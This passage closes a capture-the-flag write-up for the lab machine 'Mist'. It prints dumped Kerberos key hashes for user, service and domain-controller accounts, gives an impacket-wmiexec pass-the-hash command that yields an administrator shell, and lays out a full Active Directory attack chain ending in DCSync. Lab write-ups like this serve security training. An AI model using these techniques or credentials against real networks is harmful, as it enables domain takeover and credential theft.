Harry.Beaucorn:aes256-cts-hmac-sha1-96:f85edbb56f68155fb8b45360ba2e67cbe67893c8875d7ae1ea2a54085f082a73
Harry.Beaucorn:aes128-cts-hmac-sha1-96:e21bf6bd700e77fdea81121431629f4c
Harry.Beaucorn:des-cbc-md5:ab7c137ad364e66e
op_Sharon.Mullard:aes256-cts-hmac-sha1-96:14457283d779320d1bf9e003ee084c9f70d8fec7324345ac15d16241c512299f
op_Sharon.Mullard:aes128-cts-hmac-sha1-96:c439ce69fb34c7b2c693cd11dabd2488
op_Sharon.Mullard:des-cbc-md5:8cc158f8527585ba
op_Markus.Roheb:aes256-cts-hmac-sha1-96:630b8034289cce271b529607039bff05635578b555f055e15398e90665a3a91b
op_Markus.Roheb:aes128-cts-hmac-sha1-96:48f2924abb1cdbe2b029a679b9f95e2c
op_Markus.Roheb:des-cbc-md5:3876f7baa1e97932
svc_smb:aes256-cts-hmac-sha1-96:ab6fd9c7fb1497cd70e54fbe3e763cfac26fa660ceee14492736c6c183b74e37
svc_smb:aes128-cts-hmac-sha1-96:a8626be32fc03eff20e28b11101cd262
svc_smb:des-cbc-md5:b0f8bfb5e6ea0431
svc_cabackup:aes256-cts-hmac-sha1-96:7bb6d62ae4d9438ed967ac87ebe16c00ed8eec1d2ef6979288ad16a0ef9d1dd4
svc_cabackup:aes128-cts-hmac-sha1-96:f85ae26f1f4f33686293221872fef92a
svc_cabackup:des-cbc-md5:4a7504e5341910df
DC01$:aes256-cts-hmac-sha1-96:a47600b1ff206958b49938fdff101d4444253de01f595c7fe1a5276e4265c245
DC01$:aes128-cts-hmac-sha1-96:7043bf9b8bf4e5886058da7defab4581
DC01$:des-cbc-md5:07fef70d97161502
MS01$:aes256-cts-hmac-sha1-96:460732f7a07291f5613042a78d6b3520b950a4187d6e0621c4e273a7a8497d20
MS01$:aes128-cts-hmac-sha1-96:b07a99fa4bb7019b891f67298309e321
MS01$:des-cbc-md5:9e763e831945d5e6
svc_ca$:aes256-cts-hmac-sha1-96:9a2b40d9887c01bbff0b2aa195526a710fafc3f62989ee590b2e2eece0cda4a0
svc_ca$:aes128-cts-hmac-sha1-96:b452f82ce35a35a79d59d9cd7a7fc62c
svc_ca$:des-cbc-md5:13a12c4af23e6854
[*] Cleaning up...

With the actual hash of the Administrator, I can login with wmiexec and collect the final flag.

proxychains -q impacket-wmiexec -target-ip 192.168.100.100 \
                                -hashes :b46782b9365344abdff1a925601e0385 \
                                Administrator@dc01.mist.htb
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
[*] SMBv3.0 dialect used
[!] Launching semi-interactive shell - Careful what you execute
[!] Press help for extra shell commands
C:\>whoami
mist\administrator

Attack Path

flowchart TD

subgraph "Initial access"
    A(Image Download) -->|Download PHP File| B(Hash)
    B -->|Bruteforce| C(Password for PluckCMS)
end

subgraph "Execution"
    C -->|"Malicious" Plugin| D(Shell as svc_web)
end

subgraph "Privilege Escalation"
    D -->|Place malicious LNK file| E(Shell as brandon.keywarp)
    E -->|WebDav + ntmlrelayx + coerce| F(Shadow Credentials on MS01$)
    F -->|Silver Ticket| G(Shell as Administrator on MS01)
    G --> H(sharon.mullards Keepass and password hint)
    H -->|Hashcat mask attack| I(Shell as op_Sharon.Mullard)
    I -->|ReadGMSA| J(Hash from svc_ca$)
    J -->|Shadow Credentials| K(Access to svc_cabackup)
    K -->|"Enrollment rights\nwith template including OID Group Link\n(ESC13)"| L(Group Membership in Backup Operators)
    L -->|Backup Registry Hives on DC| M(Access as DC01$)
    M -->|DCSync| N(Full Domain Takeover)
end

Footnotes

1. Pluck CMS Releases ↩

2. Start the WebClient service ↩

3. Starting WebClient Service Programmatically ↩

4. Hybrid Attack ↩

5. ADCS ESC13 Abuse Technique ↩